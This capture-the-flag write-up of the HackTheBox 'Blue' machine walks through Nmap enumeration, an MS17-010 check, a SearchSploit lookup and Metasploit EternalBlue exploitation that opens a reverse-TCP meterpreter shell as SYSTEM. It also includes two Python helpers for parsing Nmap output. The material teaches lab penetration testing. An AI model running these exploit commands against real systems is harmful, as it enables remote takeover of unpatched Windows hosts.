

Enumeration: Portscan by Nmap
Run a port scan against the target 10.10.10.40 with Nmap.
※ If you want to learn more about Nmap, see the link below.
nmap -sC -sV -oA blue 10.10.10.40
-sC: default script scan
-sV: service version detection against open ports
-oA: Output in the three major formats at once
root@kali:~/Desktop/htb/lab/blue# nmap -sC -sV -oA blue 10.10.10.40
Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-22 03:41 EDT
Nmap scan report for 10.10.10.40
Host is up (0.24s latency).
Not shown: 991 closed ports
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -17m04s, deviation: 34m35s, median: 2m53s
| smb-os-discovery:
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: haris-PC
|   NetBIOS computer name: HARIS-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2020-04-22T08:45:33+01:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-04-22 03:45:31
|_  start_date: 2020-04-21 10:49:30
The scan shows SMB listening on 445/tcp. The service banner and smb-os-discovery both identify the host as Windows 7 Professional SP1 (build 7601), and smb-security-mode reports that SMB message signing is disabled, so unauthenticated SMBv1 access is worth examining further.
Enumeration: 445/tcp (SMB)
Nmap's default script scan does not include SMB vulnerability checks such as EternalBlue, so run a second Nmap script scan against port 445. First, combine locate, xargs and grep to list the SMB-related NSE scripts together with their categories.
locate -r '\.nse$' | xargs grep categories | grep -i smb
-r: Regular Expression
root@kali:~/Desktop/htb/lab/devel# locate -r '\.nse$' | xargs grep categories | grep -i smb
/usr/share/nmap/scripts/smb-brute.nse:categories = {"intrusive", "brute"}
/usr/share/nmap/scripts/smb-double-pulsar-backdoor.nse:categories = {"vuln", "safe", "malware"}
/usr/share/nmap/scripts/smb-enum-domains.nse:categories = {"discovery","intrusive"}
/usr/share/nmap/scripts/smb-enum-groups.nse:categories = {"discovery","intrusive"}
/usr/share/nmap/scripts/smb-enum-processes.nse:categories = {"discovery", "intrusive"}
/usr/share/nmap/scripts/smb-enum-services.nse:categories = {"discovery","intrusive","safe"}
/usr/share/nmap/scripts/smb-enum-sessions.nse:categories = {"discovery","intrusive"}
/usr/share/nmap/scripts/smb-enum-shares.nse:categories = {"discovery","intrusive"}
/usr/share/nmap/scripts/smb-enum-users.nse:categories = {"auth","intrusive"}
/usr/share/nmap/scripts/smb-flood.nse:categories = {"intrusive","dos"}
/usr/share/nmap/scripts/smb-ls.nse:categories = {"discovery", "safe"}
/usr/share/nmap/scripts/smb-mbenum.nse:categories = {"discovery", "safe"}
/usr/share/nmap/scripts/smb-os-discovery.nse:categories = {"default", "discovery", "safe"}
/usr/share/nmap/scripts/smb-print-text.nse:categories = {"intrusive"}
/usr/share/nmap/scripts/smb-protocols.nse:categories = {"safe", "discovery"}
/usr/share/nmap/scripts/smb-psexec.nse:categories = {"intrusive"}
/usr/share/nmap/scripts/smb-security-mode.nse:categories = {"default", "discovery", "safe"}
/usr/share/nmap/scripts/smb-server-stats.nse:categories = {"discovery","intrusive"}
/usr/share/nmap/scripts/smb-system-info.nse:categories = {"discovery","intrusive"}
/usr/share/nmap/scripts/smb-vuln-conficker.nse:categories = {"intrusive","exploit","dos","vuln"}
/usr/share/nmap/scripts/smb-vuln-cve-2017-7494.nse:categories = {"vuln","intrusive"}
/usr/share/nmap/scripts/smb-vuln-cve2009-3103.nse:categories = {"intrusive","exploit","dos","vuln"}
/usr/share/nmap/scripts/smb-vuln-ms06-025.nse:categories = {"intrusive","exploit","dos","vuln"}
/usr/share/nmap/scripts/smb-vuln-ms07-029.nse:categories = {"intrusive","exploit","dos","vuln"}
/usr/share/nmap/scripts/smb-vuln-ms08-067.nse:categories = {"intrusive","exploit","dos","vuln"}
/usr/share/nmap/scripts/smb-vuln-ms10-054.nse:categories = {"vuln","intrusive","dos"}
/usr/share/nmap/scripts/smb-vuln-ms10-061.nse:categories = {"vuln","intrusive"}
/usr/share/nmap/scripts/smb-vuln-ms17-010.nse:categories = {"vuln", "safe"}
/usr/share/nmap/scripts/smb-vuln-regsvc-dos.nse:categories = {"intrusive","exploit","dos","vuln"}
/usr/share/nmap/scripts/smb2-capabilities.nse:categories = {"safe", "discovery"}
/usr/share/nmap/scripts/smb2-security-mode.nse:categories = {"safe", "discovery", "default"}
/usr/share/nmap/scripts/smb2-time.nse:categories = {"discovery", "safe", "default"}
/usr/share/nmap/scripts/smb2-vuln-uptime.nse:categories = {"vuln", "safe"}
The MS17-010 (EternalBlue) check, smb-vuln-ms17-010, is in both the vuln and safe categories, so run an Nmap script scan restricted to scripts that belong to both. Selecting "vuln and safe" rather than plain "vuln" keeps out the smb-vuln-ms* scripts that also carry the intrusive, exploit or dos categories, which could crash the target during enumeration.
nmap -p 445 --script "vuln and safe" -Pn -n 10.10.10.40
--script <category>: script scan in specific category
-Pn: Treat all hosts as online -- skip host discovery
-n: Do not resolve hostnames via DNS
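As an added example (not part of the original write-up), the following Python re-implements the category selection that `--script "vuln and safe"` performs, over lines in the exact shape the locate/xargs/grep pipeline prints. The sample lines are copied from the listing above; the expression evaluator handles `and`, `or`, `not` and parentheses over category names only, not the script names or wildcards that Nmap's real `--script` also accepts.

```python
import re

# Constructed sample: lines copied from the locate/xargs/grep listing above,
# in the exact "<path>:categories = {...}" shape grep prints.
SAMPLE = """\
/usr/share/nmap/scripts/smb-vuln-ms17-010.nse:categories = {"vuln", "safe"}
/usr/share/nmap/scripts/smb-vuln-ms08-067.nse:categories = {"intrusive","exploit","dos","vuln"}
/usr/share/nmap/scripts/smb-os-discovery.nse:categories = {"default", "discovery", "safe"}
/usr/share/nmap/scripts/smb2-vuln-uptime.nse:categories = {"vuln", "safe"}
/usr/share/nmap/scripts/smb-double-pulsar-backdoor.nse:categories = {"vuln", "safe", "malware"}
/usr/share/nmap/scripts/smb-vuln-ms10-054.nse:categories = {"vuln","intrusive","dos"}
"""

LINE_RE = re.compile(
    r'^(?P<path>.*/(?P<name>[^/]+)\.nse):categories\s*=\s*\{(?P<cats>[^}]*)\}'
)


def parse_categories(text):
    """Map script name -> set of categories, parsed from grep output lines."""
    scripts = {}
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        cats = {c.strip().strip('"\'') for c in m.group("cats").split(",") if c.strip()}
        scripts[m.group("name")] = cats
    return scripts


def evaluate(expr, cats):
    """Evaluate an Nmap-style category expression against one script's categories.

    Grammar (same precedence as Nmap): expr := term ('or' term)*
                                        term := factor ('and' factor)*
                                        factor := 'not' factor | '(' expr ')' | CATEGORY
    A small recursive-descent parser is used instead of eval() so that an
    untrusted expression can never execute anything.
    """
    tokens = re.findall(r"\(|\)|[\w-]+", expr.lower())
    pos = [0]

    def peek():
        return tokens[pos[0]] if pos[0] < len(tokens) else None

    def take():
        tok = tokens[pos[0]]
        pos[0] += 1
        return tok

    def parse_or():
        val = parse_and()
        while peek() == "or":
            take()
            rhs = parse_and()  # always consume the right-hand side
            val = val or rhs
        return val

    def parse_and():
        val = parse_not()
        while peek() == "and":
            take()
            rhs = parse_not()
            val = val and rhs
        return val

    def parse_not():
        tok = peek()
        if tok == "not":
            take()
            return not parse_not()
        if tok == "(":
            take()
            val = parse_or()
            if take() != ")":
                raise ValueError("unbalanced parentheses in %r" % expr)
            return val
        if tok is None or tok in ("and", "or", ")"):
            raise ValueError("unexpected token %r in %r" % (tok, expr))
        take()
        return tok in cats  # a bare word is a category membership test

    result = parse_or()
    if peek() is not None:
        raise ValueError("trailing tokens in %r" % expr)
    return result


def select_scripts(text, expr):
    """Sorted names of the scripts whose categories satisfy expr."""
    return sorted(name for name, cats in parse_categories(text).items() if evaluate(expr, cats))


if __name__ == "__main__":
    for expr in ("vuln and safe", "vuln and not dos", "vuln and dos"):
        print("%-20s -> %s" % (expr, ", ".join(select_scripts(SAMPLE, expr))))
```

Running it shows why the category choice matters: with `vuln and safe` (or `vuln and not dos`) every `smb-vuln-ms*` script that also carries `dos` drops out, while smb-vuln-ms17-010 stays in; `vuln and dos` selects exactly the checks you would not want to fire blindly at a production host.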
root@kali:~/Desktop/htb/lab/blue# nmap -p 445 --script "vuln and safe" -Pn -n 10.10.10.40
Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-22 04:20 EDT
Nmap scan report for 10.10.10.40
Host is up (0.31s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
The script reports the target as VULNERABLE to MS17-010 (EternalBlue, CVE-2017-0143). Note that smb-vuln-ms17-010 is a safe-category check: it infers the missing patch from the SMBv1 server's response to a crafted transaction rather than attempting exploitation, which is why it can be run during enumeration.
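Because `-oA` also writes an XML report, a scan over a whole range can be triaged without reading the text output host by host. This added Python script (not from the original write-up) extracts the smb-vuln-ms17-010 state for every host in Nmap XML. The embedded document is a constructed fragment modelled on the structured `<table>/<elem key="state">` output that Nmap's vulns library emits, with a second host written as it appears when `--script-args vulns.showall` is set; the exact element layout is an assumption, so the code falls back to the free-text `output` attribute when no `state` element is present.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample Nmap XML (not a real capture): one vulnerable host, one host
# reported as NOT VULNERABLE (as with --script-args vulns.showall), and one host
# on which the script produced no result at all.
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -p 445 --script &quot;vuln and safe&quot; -oA blue 10.10.10.0/24">
  <host>
    <status state="up"/>
    <address addr="10.10.10.40" addrtype="ipv4"/>
    <ports><port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port></ports>
    <hostscript>
      <script id="smb-vuln-ms17-010" output="&#10;  VULNERABLE:&#10;  Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)&#10;    State: VULNERABLE&#10;    IDs:  CVE:CVE-2017-0143&#10;    Risk factor: HIGH">
        <table key="CVE-2017-0143">
          <elem key="title">Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)</elem>
          <elem key="state">VULNERABLE</elem>
          <table key="ids"><elem>CVE:CVE-2017-0143</elem></table>
          <elem key="risk_factor">HIGH</elem>
        </table>
      </script>
    </hostscript>
  </host>
  <host>
    <status state="up"/>
    <address addr="10.10.10.41" addrtype="ipv4"/>
    <hostscript>
      <script id="smb-vuln-ms17-010" output="&#10;  NOT VULNERABLE:&#10;    State: NOT VULNERABLE">
        <table key="CVE-2017-0143">
          <elem key="state">NOT VULNERABLE</elem>
        </table>
      </script>
    </hostscript>
  </host>
  <host>
    <status state="up"/>
    <address addr="10.10.10.42" addrtype="ipv4"/>
  </host>
</nmaprun>
"""

STATE_RE = re.compile(r"State:\s*([A-Z ]+?)\s*$", re.M)


def script_states(xml_text, script_id="smb-vuln-ms17-010"):
    """Return {ipv4_address: state} for every host on which script_id reported."""
    root = ET.fromstring(xml_text)
    results = {}
    for host in root.iter("host"):
        addr = next(
            (a.get("addr") for a in host.findall("address") if a.get("addrtype") == "ipv4"),
            None,
        )
        if addr is None:
            continue
        for script in host.iter("script"):
            if script.get("id") != script_id:
                continue
            # Preferred: the structured <elem key="state"> the vulns library writes.
            state = next(
                ((e.text or "").strip() for e in script.iter("elem") if e.get("key") == "state"),
                None,
            )
            if state is None:
                # Fallback: parse the "State: ..." line out of the free-text output.
                m = STATE_RE.search(script.get("output", ""))
                state = m.group(1).strip() if m else "UNKNOWN"
            results[addr] = state
    return results


def vulnerable_hosts(xml_text, script_id="smb-vuln-ms17-010"):
    """Sorted addresses whose state is exactly VULNERABLE (LIKELY VULNERABLE is excluded)."""
    return sorted(a for a, s in script_states(xml_text, script_id).items() if s == "VULNERABLE")


if __name__ == "__main__":
    for addr, state in sorted(script_states(SAMPLE_XML).items()):
        print("%-15s %s" % (addr, state))
    print("exploit candidates:", ", ".join(vulnerable_hosts(SAMPLE_XML)))
```

In practice you would read the `blue.xml` that `-oA blue` produced instead of the embedded string; hosts with no `smb-vuln-ms17-010` element (the third host above) are left out of the result deliberately, since "no report" is not the same as "not vulnerable".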
Exploitation: 445/tcp (SMB)
Search for MS17-010 exploits with SearchSploit.
※ If you want to learn more about SearchSploit, see the link below.
searchsploit MS17-010
root@kali:~/Desktop/htb/lab/blue# searchsploit MS17-010
------------------------------------------------------------------------------------------------------------------------------------------ ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
------------------------------------------------------------------------------------------------------------------------------------------ ----------------------------------------
Microsoft Windows - 'EternalRomance'/'EternalSynergy'/'EternalChampion' SMB Remote Code Execution (Metasploit) (MS17-010) | exploits/windows/remote/43970.rb
Microsoft Windows - SMB Remote Code Execution Scanner (MS17-010) (Metasploit) | exploits/windows/dos/41891.rb
Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010) | exploits/windows/remote/41987.py
Microsoft Windows Windows 7/2008 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010) | exploits/windows_x86-64/remote/42031.py
Microsoft Windows Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010) | exploits/windows/remote/42315.py
Microsoft Windows Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010) | exploits/windows_x86-64/remote/42030.py
------------------------------------------------------------------------------------------------------------------------------------------ ----------------------------------------
Six entries match. Note that 41891, "Microsoft Windows – SMB Remote Code Execution Scanner (MS17-010) (Metasploit)", is the Metasploit detection module rather than an exploit (it corresponds to auxiliary/scanner/smb/smb_ms17_010 below); exploitation itself is done from Metasploit in the next step. To see the entry's URL and full path, rerun SearchSploit with "-p".
searchsploit -p 41891
root@kali:~/Desktop/htb/lab/blue# searchsploit -p 41891
Exploit: Microsoft Windows - SMB Remote Code Execution Scanner (MS17-010) (Metasploit)
URL: https://www.exploit-db.com/exploits/41891/
Path: /usr/share/exploitdb/exploits/windows/dos/41891.rb
File Type: Ruby script, ASCII text, with CRLF line terminators
Opening the URL above shows the corresponding Exploit DB page.
Start Metasploit with msfdb run and search for ms17-010 modules.
msfdb run
msf > search ms17-010
msf > search ms17-010

Matching Modules
================

   Name                                           Disclosure Date  Rank     Description
   ----                                           ---------------  ----     -----------
   auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   auxiliary/scanner/smb/smb_ms17_010                              normal   MS17-010 SMB RCE Detection
   exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
Use the exploit module exploit/windows/smb/ms17_010_eternalblue from the results above. Its rank is only "average": the module works by corrupting the kernel pool, so a failed attempt can blue-screen the target. Match the payload to the target architecture (x64 here, per the Nmap and systeminfo output) and set LHOST to the VPN interface so the reverse shell can reach the attacker.
msf > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(windows/smb/ms17_010_eternalblue) > set lhost tun0
msf exploit(windows/smb/ms17_010_eternalblue) > set rhost 10.10.10.40
msf exploit(windows/smb/ms17_010_eternalblue) > exploit
The exploit returns a shell running as NT AUTHORITY\SYSTEM: because the bug is in the kernel-mode SMBv1 driver, a successful exploit lands directly at the highest local privilege, with no separate privilege-escalation step.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
sysinfo and systeminfo confirm the following system information:
– OS: Microsoft Windows 7 Professional
– OS Version: 6.1.7601 Service Pack 1 Build 7601
– Architecture: x64
– Hotfixes: 200 installed
– Original Install Date: 14/07/2017, 14:45:30
meterpreter > sysinfo
Computer : HARIS-PC
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64
System Language : en_GB
Domain : WORKGROUP
Logged On Users : 0
Meterpreter : x64/windows
meterpreter > shell
Process 1680 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>systeminfo
systeminfo
Host Name: HARIS-PC
OS Name: Microsoft Windows 7 Professional
OS Version: 6.1.7601 Service Pack 1 Build 7601
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: haris
Registered Organization:
Product ID: 00371-223-0841251-86078
Original Install Date: 14/07/2017, 14:45:30
System Boot Time: 21/04/2020, 15:49:12
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
[02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-gb;English (United Kingdom)
Input Locale: en-us;English (United States)
Time Zone: (UTC) Dublin, Edinburgh, Lisbon, London
Total Physical Memory: 2,047 MB
Available Physical Memory: 1,433 MB
Virtual Memory: Max Size: 4,095 MB
Virtual Memory: Available: 3,450 MB
Virtual Memory: In Use: 645 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): 200 Hotfix(s) Installed.
[01]: KB2849697
[02]: KB2849696
[03]: KB2841134
---------excerpt-----------
[199]: KB976902
[200]: KB982018
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.40
[02]: fe80::7c51:acf2:ed03:8b2
[03]: dead:beef::dc1c:2bf:be01:5072
[04]: dead:beef::7c51:acf2:ed03:8b2
Links
- HackTheBox – Blue by IppSec
https://www.youtube.com/watch?v=YRsfX6DW10E&t=1212s
